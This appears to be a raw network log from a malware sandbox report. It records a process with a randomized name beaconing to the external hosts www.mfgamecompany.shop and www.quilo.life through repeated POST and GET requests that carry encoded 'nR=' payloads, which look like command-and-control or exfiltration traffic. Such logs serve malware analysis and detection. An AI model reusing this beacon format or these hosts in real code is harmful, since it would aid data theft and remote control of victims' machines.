                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.549727185.173.111.76804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:46.190018892 CEST762OUTPOST /lwt6/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Origin: http://www.mfgamecompany.shop
                    Referer: http://www.mfgamecompany.shop/lwt6/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 56 45 67 31 34 37 62 68 5a 7a 47 2b 72 51 68 34 61 75 57 31 42 4c 2f 36 71 66 44 4d 65 46 44 7a 65 6b 48 39 4e 37 54 4a 35 30 46 47 34 32 78 47 44 33 4a 2f 45 54 37 6b 63 44 66 4e 48 72 42 51 68 50 4c 58 37 4c 52 59 56 6a 49 66 70 6c 6d 51 53 75 62 68 71 66 35 6e 4c 52 4b 75 59 52 42 31 61 31 4d 63 56 68 43 76 58 64 64 62 4f 77 74 4a 58 6e 64 48 6e 6c 69 57 35 73 73 72 71 2b 43 2f 73 39 79 72 58 35 34 34 66 52 55 51 52 75 62 48 32 31 6c 77 72 6a 44 79 6a 70 51 48 78 5a 78 39 79 41 43 4b 62 56 64 66 6b 4b 4f 76 53 43 54 62 32 6c
                    Data Ascii: nR=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LVEg147bhZzG+rQh4auW1BL/6qfDMeFDzekH9N7TJ50FG42xGD3J/ET7kcDfNHrBQhPLX7LRYVjIfplmQSubhqf5nLRKuYRB1a1McVhCvXddbOwtJXndHnliW5ssrq+C/s9yrX544fRUQRubH21lwrjDyjpQHxZx9yACKbVdfkKOvSCTb2l
                    Sep 12, 2024 13:03:46.957264900 CEST1086INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:46 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.549728185.173.111.76804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:48.736520052 CEST1779OUTPOST /lwt6/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Origin: http://www.mfgamecompany.shop
                    Referer: http://www.mfgamecompany.shop/lwt6/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 39 73 39 7a 73 69 74 73 62 44 61 42 51 78 61 54 6c 65 33 34 48 50 6e 49 51 2f 6c 53 56 56 74 30 73 6d 55 45 64 7a 68 62 75 39 38 4e 35 32 30 43 66 4b 70 42 4a 36 75 43 30 7a 36 62 6a 50 61 42 7a 4d 46 46 79 69 77 6b 50 67 4b 37 58 4a 2f 4e 56 74 65 55 6f 34 4a 49 56 74 58 6e 45 63 36 51 6b 6e 77 75 62 53 30 35 71 6b 4e 34 63 67 37 51 53 77 38 6b 72 32 33 67 39 58 47 2f 33 65 44 76 34 65 45 75 57 31 63 34 47 43 2f 47 31 6a 32 74 31 52 71 39 66 42 65 2f 73 45 32 51 69 36 5a 4d 2b 72 67 48 47 4e [TRUNCATED]
                    Data Ascii: nR=u91ZDexvlNKHPq8ZyzDgmeWR9RyUv3Zv0+7RPxkB+LNEjHw7aGtzUOrQ/IavW1Bs/+GTDMC/DxmkGeF7CLR0Q242uWD0DfEa7kNKfM3rBQhPLRfLXK9jTfpmvwSqfhq75k6uKvsnCBW1V8FhBZLdArOyuJXFdH76iWkVsr2YC9s9zsitsbDaBQxaTle34HPnIQ/lSVVt0smUEdzhbu98N520CfKpBJ6uC0z6bjPaBzMFFyiwkPgK7XJ/NVteUo4JIVtXnEc6QknwubS05qkN4cg7QSw8kr23g9XG/3eDv4eEuW1c4GC/G1j2t1Rq9fBe/sE2Qi6ZM+rgHGN3OVZ/Ult5ADf7ORIFqM/9I2TEsymwqQo+6hPgFk1F2BUnAmFogNZmSbp+R3IasmEhFDhwabjDRB1573hij4RfuHB3AMNDM9jaKziJS9xjpHz6i3JahY8x1IbjTPh3dNzY0U3DW9jTOcLO6+oKqKeuzv7Vi+MIw0Sjm9oYDRKsLKGl1L9HI5xcMCakJnquXbXli3krtLG8G0FmDHJ9hRYFUM62jAA6ccaKDt1eotSkP4AAoQTME+b5ihEfF8PF/77yjaiweKCO8SDJIuf/H9a+SWoffWto5TF83G5fxjhgIqpGYbYuDI5zHZpxuFDU6BUD0Lgx/GL5qHi+XZR0tdz/hegUIqgiEcFCWRSMg1qsuEjC8QB8QLDlrEh0NEDO7amhM0FcoCY4DHtk2NXWqEGezKXWjJh19fduFmGU/92onWdy9T5QwSpLFH2tpcLqjZplQ6RHTFYwBWftpAKHRnEPI+zW59R31TQIYRfZY1gcbIxlAcxmWfEKyPVEfykRcnWokk2CtQjs7GZHeitKSKKRsgrupXGPPSgOFRGt+wBgMdpMWJtc3apzYriZZQNho7FE3toV4EY6/JHnc4828Hf1y9hHRH1obFRZbqaMtQYjejwHDScj64UIOWEM9jxLkMLxGqpWzlndjKRcpQKKvEl33wy/yhQ5Rb+NF [TRUNCATED]
                    Sep 12, 2024 13:03:49.398442030 CEST1086INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:49 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.549729185.173.111.76804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:51.278351068 CEST465OUTGET /lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ== HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.mfgamecompany.shop
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:51.946367979 CEST1230INHTTP/1.1 301 Moved Permanently
                    Connection: close
                    content-type: text/html
                    content-length: 795
                    date: Thu, 12 Sep 2024 11:03:51 GMT
                    server: LiteSpeed
                    location: https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ==
                    platform: hostinger
                    panel: hpanel
                    content-security-policy: upgrade-insecure-requests
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.549730203.161.43.228804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:57.018244028 CEST718OUTPOST /ftr3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Origin: http://www.quilo.life
                    Referer: http://www.quilo.life/ftr3/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 2b 75 4d 54 58 52 42 62 70 63 6c 30 72 36 43 75 48 66 70 6a 43 41 50 34 65 74 4e 64 64 44 47 4f 6c 48 72 59 79 59 3d
                    Data Ascii: nR=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/y+uMTXRBbpcl0r6CuHfpjCAP4etNddDGOlHrYyY=
                    Sep 12, 2024 13:03:57.620933056 CEST658INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:03:57 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.549731203.161.43.228804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:59.568510056 CEST738OUTPOST /ftr3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Origin: http://www.quilo.life
                    Referer: http://www.quilo.life/ftr3/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 69 30 6d 48 2f 66 34 44 4d 41 49 32 51 63 45 53 53 76 63 45 53 56 69 6e 73 59 6f 62 34 76 65 4d 71 6c 5a 45 39 56 35 75 43 71 2f 4f 42 5a 41 61 4b 62 36 73 6b 33 31 75 47 32 47 76 31 39 61 4f 4f 76 72 43 74 54 30 4a 6a 38 54 5a 76 79 70 57 31 35 76 55 53 53 4c 6c 63 71 41 45 61 54 6d 74 5a 6a 79 57 6d 68 56 75 63 4d 45 71 34 2b 4f 6a 65 65 31 4d 32 61 33 50 65 56 4d 30 73 6a 59 2f 64 61 34 39 58 6f 30 6c 58 42 77 69 73 33 6f 4e 6c 36 4d 74 69 76 55 47 58 62 47 6c 4e 33 51 73 32 74 45 51 74 2b 31 55 6f 41 65 67 66 30 6b 65 53 64
                    Data Ascii: nR=2iJzcjLeEdvuEP0sXP8GmEc+vyxuhWMTtPJ6DobN5ii0mH/f4DMAI2QcESSvcESVinsYob4veMqlZE9V5uCq/OBZAaKb6sk31uG2Gv19aOOvrCtT0Jj8TZvypW15vUSSLlcqAEaTmtZjyWmhVucMEq4+Ojee1M2a3PeVM0sjY/da49Xo0lXBwis3oNl6MtivUGXbGlN3Qs2tEQt+1UoAegf0keSd
                    Sep 12, 2024 13:04:00.150923014 CEST658INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:04:00 GMT
                    Server: Apache
                    Content-Length: 514
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.549732203.161.43.228804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:02.111869097 CEST1755OUTPOST /ftr3/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.quilo.life
                    Origin: http://www.quilo.life
                    Referer: http://www.quilo.life/ftr3/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 52 61 37 62 69 45 6b 6e 4c 48 71 52 73 7a 6f 65 39 55 4e 72 53 42 61 6d 43 78 46 56 46 75 52 75 61 67 55 57 68 42 31 77 39 66 42 55 37 4d 70 35 72 50 77 39 47 35 70 5a 79 6e 71 51 47 69 5a 36 6f 7a 70 6e 70 6f 74 44 35 76 77 50 50 52 56 6c 41 64 52 64 51 7a 7a 6c 6d 46 6b 52 63 2f 55 42 53 48 4e 57 30 51 49 48 30 5a 6f 70 59 75 47 4b 64 7a 70 38 6b 6d 54 39 33 35 39 65 79 5a 56 36 68 69 78 44 74 49 68 35 4c 2b 43 55 45 47 73 48 62 6c 2f 4e 66 6c 46 4d 30 62 5a 56 35 4e 57 74 35 6a 68 31 39 [TRUNCATED]
